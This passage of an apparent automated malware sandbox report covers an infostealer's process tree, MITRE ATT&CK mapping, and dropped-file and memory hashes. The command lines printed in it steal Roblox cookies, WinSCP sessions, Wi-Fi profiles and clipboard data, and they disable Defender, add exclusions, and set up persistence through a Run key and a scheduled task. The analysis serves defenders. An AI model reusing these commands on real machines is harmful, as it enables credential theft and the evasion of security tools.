  C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\vugMEFS0rizu.vbs"
  2⤵
  PID:8608
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Roaming\vugMEFS0rizu.vbs
    3⤵
    PID:6584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
  2⤵
  PID:8540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
  2⤵
  PID:8132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "function Get-AntiVirusProduct {
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
  2⤵
  PID:7024
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    PID:5336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
  2⤵
  PID:7944
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
    3⤵
    PID:7208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:7548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:9492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Failed' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
  2⤵
  PID:8980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:9268
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:9100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
  2⤵
  PID:5832
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:6384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
  2⤵
  PID:6256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:10212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_UOUIF5 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_UOUIF5.vbs /f"
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_UOUIF5 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_UOUIF5.vbs /f
    3⤵
    - Adds Run key to start application
    PID:6356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_UOUIF5.vbs\"""
  2⤵
  PID:7384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_UOUIF5.vbs\""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8096
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_UOUIF5.vbs
      4⤵
      Views/modifies file attributes
      PID:7960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutmPyDM.ps1" -RunAsAdministrator"
  2⤵
  PID:4844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutmPyDM.ps1" -RunAsAdministrator
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7580
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1620 --field-trial-handle=1676,i,6424519353352575281,12786802167521524184,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

Filesize
43KB

MD5
252b4fda07550496d330d819f15ceb3e

SHA1
650584312b310219a26d5fc20cb1804bb6c4dde5

SHA256
39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d

SHA512
a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

Filesize
33KB

MD5
c555604e8b6f818991e186342f856b1b

SHA1
3ae02db8eba2f4fa30cb7567a9f5bf8346faded0

SHA256
012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972

SHA512
01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

Filesize
1KB

MD5
f0f11cd478cc44d518c16820ede9d253

SHA1
cfaf8d2e071f2ade0894578e5b44e02032d27be4

SHA256
321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb

SHA512
ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

Filesize
5KB

MD5
2f0a6a34d9b95bba0e3358ddd41ff2ac

SHA1
f39a9e7aeab9fe86fd9034284516de40186e6e93

SHA256
6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5

SHA512
a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6e5843696d70df783161968b9f9e1759

SHA1
6e7ab4a749b553ff66e8914563ca9f98cabe3ecd

SHA256
51f80b81fae4ad9aa2b195b561274799f4bab0b9c12b0b86748044f12bbab719

SHA512
5b44b40619c0467fc41009a5ca7638ae3ab948757c4707b8439c7485635d9cfb120406d76e330b0993f17f63739a7d8d40e3ae71574a89428501ab63a44e9093

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
631199bf8eff0f9198317b1aa354922e

SHA1
695ede4294c2d9273e573814356a819ea693d2f7

SHA256
534550fccd9c112dc6df050d2c768d2a0f77768aecfa4e20aa1cc1ac80342b1c

SHA512
d3a373a1909407243c68417c6e0037bdb55e4cde593038371ed9aab927bd8591e7089778dfcede66f0eae2da30dc5083b330257b4e8ec46874457afe9247f2c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9d01bc05073d026b676edd8e5064ac72

SHA1
221579d22e2389cb27cfc880064b7a5b1734e347

SHA256
6b554498594ece7dc91b5e95cba6d2b79f764ec0f261b5d23bfd1eebcf1f4459

SHA512
dfb8ffa48ae4c3c123eb17fefb47cdacd6f0798958587b37a8b547340a087bf7d39bf95cf0f241e0c0871c62c916623ec411187c65a9b32ceb1b0c589e6b1fbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\763dd971-7a81-4657-b095-afd3aa8d1a42.tmp.node

Filesize
154KB

MD5
56c465754297ae8b4a4991d094af1833

SHA1
0695ed545b27842df51fa32d7ad03f6db661afe1

SHA256
9a02d4912fcc6c9195276e200afe8cb64f9f271101f54e24bcfb5519f7bb1e73

SHA512
44a3057df23f63ee58134cd064cdae0c3d4045787f5a589321346711a8778105407364595a6af984f2c82da974965ae1d29586176b70bcf634d55cd213c74509

Download Submit
C:\Users\Admin\AppData\Local\Temp\825a2fac-7980-4859-aa8e-5250e4f44e63.tmp.node

Filesize
1.4MB

MD5
56192831a7f808874207ba593f464415

SHA1
e0c18c72a62692d856da1f8988b0bc9c8088d2aa

SHA256
6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

SHA512
c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_89.zip

Filesize
2KB

MD5
5f77fbf3607806c797f6e3926fafbc0c

SHA1
aefa5b25d96797b1288f07590ffba7e62ea1aea6

SHA256
16e7f27759ef0b1e66accb6b1d8d84aa511ec1c0d493719e5a334dbab7cdcaff

SHA512
c927102eecc3cc69c96a8450a4f4e4afadeffff3ffd026a2df9d6b782dea580cce7080e943ac7264171f358d915f2a3cc8a0a5fc47b72ec371df77dc35f0395a

Download Submit
C:\Users\Admin\AppData\Local\Temp\O6urZJ6LVB4I_tezmp.ps1

Filesize
728B

MD5
11be7e3480cc2a57bb190cb40348d1c1

SHA1
068a19b3fd379f1ed3d92061fa7ab87e33b8e134

SHA256
b7e7c2591c6efeab1dedba76ea5d1e73b21cfda2505bff0a0b177e0074bdeac8

SHA512
0d99c14525ce344ce7c61a88b227d19d731e97604ba3f8fb20b046b5c26a25e9fa89a0e7ec785bf392caee8cdb130fbea7a00660a95f81685d5748ae7363d5d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqwq4btr.30y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_UOUIF5.vbs

Filesize
4KB

MD5
81c3f40e4f5fe88a7dd5b6a7ff53e390

SHA1
a2a8a5cf534ae27103bf7700a2fd79ffa829cc7d

SHA256
283b61845f9ac1fd51e7fab60483b87cf04bb7d03ae5fa07b8c60c2075806e67

SHA512
28ad2e9c7354978f8ad4bef560428e04d0d84a00ea62d910c031dca1bf95f1824b56735059c512ca0297a53f49ad5dc38c29bd6ca7d9e5fc6487fce73fb1055b

Download Submit
C:\Users\Admin\AppData\Roaming\salutmPyDM.ps1

Filesize
365B

MD5
4fdddf586aed433adb0bfe7362592055

SHA1
a0e31dcb709ccd9e7078529880c66611d7f418ea

SHA256
4e26e8214c7ebcb5afa23bc8f5e545dd9c8a782a7ee1d3d40531cf4ee09fbac0

SHA512
99c4fe58658e487fa54d82d1c041c2af5efdafc98dc1e079d3a250b973a435aef488e334849a0e052f6b99546df6d6518cf43b4d606edf5fc637169000ae2362

Download Submit
C:\Users\Admin\AppData\Roaming\vugMEFS0rizu.vbs

Filesize
139B

MD5
21e41722b065c94c5ddbca8ded939d7c

SHA1
1932cd73750a15bf821daa5a9755c230ff01e979

SHA256
e4de485769fe119786d78cf328979518ab7a4531cf05931d5cae980a50552c64

SHA512
1c9cdf8b9c44cbdf0b83f2ee84bb13d366352bb5f870159e760f880332edc9d6b65d2029a366708cd729e769e4394af547165ccc0829713c00f9e1e9f44eb6c5

Download Submit
memory/2056-309-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/2056-298-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/4272-363-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/4272-365-0x000002175EFD0000-0x000002175EFE0000-memory.dmp

Filesize
64KB

Download
memory/4272-367-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/4272-364-0x000002175EFD0000-0x000002175EFE0000-memory.dmp

Filesize
64KB

Download
memory/5800-267-0x000001E6BA0F0000-0x000001E6BA100000-memory.dmp

Filesize
64KB

Download
memory/5800-232-0x000001E6BA0F0000-0x000001E6BA100000-memory.dmp

Filesize
64KB

Download
memory/5800-226-0x000001E6BA0F0000-0x000001E6BA100000-memory.dmp

Filesize
64KB

Download
memory/5800-224-0x00007FF9F4B60000-0x00007FF9F5622000-memory.dmp

Filesize
10.8MB

Download
memory/5800-280-0x00007FF9F4B60000-0x00007FF9F5622000-memory.dmp

Filesize
10.8MB

Download
memory/6576-294-0x000001EAD4830000-0x000001EAD4840000-memory.dmp

Filesize
64KB

Download
memory/6576-296-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/6576-292-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/6952-274-0x00007FF9F4B60000-0x00007FF9F5622000-memory.dmp

Filesize
10.8MB

Download
memory/6952-247-0x00007FF9F4B60000-0x00007FF9F5622000-memory.dmp

Filesize
10.8MB

Download
memory/6952-266-0x000001F109230000-0x000001F109240000-memory.dmp

Filesize
64KB

Download
memory/7332-494-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-495-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-486-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-497-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-485-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-492-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-493-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-487-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-496-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7332-491-0x000001D4C1130000-0x000001D4C1131000-memory.dmp

Filesize
4KB

Download
memory/7568-368-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/7568-379-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/7580-436-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/7580-442-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/7580-438-0x0000015DC6180000-0x0000015DC6190000-memory.dmp

Filesize
64KB

Download
memory/8096-404-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/8096-407-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/8144-326-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/8144-339-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/8144-327-0x000002C3DAF20000-0x000002C3DAF30000-memory.dmp

Filesize
64KB

Download
memory/8524-246-0x0000015FF5160000-0x0000015FF5170000-memory.dmp

Filesize
64KB

Download
memory/8524-275-0x00007FF9F4B60000-0x00007FF9F5622000-memory.dmp

Filesize
10.8MB

Download
memory/8524-245-0x00007FF9F4B60000-0x00007FF9F5622000-memory.dmp

Filesize
10.8MB

Download
memory/8524-248-0x0000015FF5160000-0x0000015FF5170000-memory.dmp

Filesize
64KB

Download
memory/8524-268-0x0000015FF5160000-0x0000015FF5170000-memory.dmp

Filesize
64KB

Download
memory/8592-350-0x000001E7C4790000-0x000001E7C47A0000-memory.dmp

Filesize
64KB

Download
memory/8592-353-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/8592-349-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/8592-351-0x000001E7C4790000-0x000001E7C47A0000-memory.dmp

Filesize
64KB

Download
memory/9000-53-0x00007FF9F4D60000-0x00007FF9F5822000-memory.dmp

Filesize
10.8MB

Download
memory/9000-48-0x000002D2E66E0000-0x000002D2E66F0000-memory.dmp

Filesize
64KB

Download
memory/9000-46-0x000002D2E66E0000-0x000002D2E66F0000-memory.dmp

Filesize
64KB

Download
memory/9000-45-0x00007FF9F4D60000-0x00007FF9F5822000-memory.dmp

Filesize
10.8MB

Download
memory/10212-380-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/10212-390-0x0000020BFBAD0000-0x0000020BFBAE0000-memory.dmp

Filesize
64KB

Download
memory/10212-392-0x00007FF9F4CB0000-0x00007FF9F5772000-memory.dmp

Filesize
10.8MB

Download
memory/11116-34-0x00007FF9F4D60000-0x00007FF9F5822000-memory.dmp

Filesize
10.8MB

Download
memory/11116-30-0x00000230FBF20000-0x00000230FBF30000-memory.dmp

Filesize
64KB

Download
memory/11116-29-0x00000230FBF20000-0x00000230FBF30000-memory.dmp

Filesize
64KB

Download
memory/11116-28-0x00007FF9F4D60000-0x00007FF9F5822000-memory.dmp

Filesize
10.8MB

Download
memory/11116-27-0x00000230FBFD0000-0x00000230FBFF2000-memory.dmp

Filesize
136KB

Download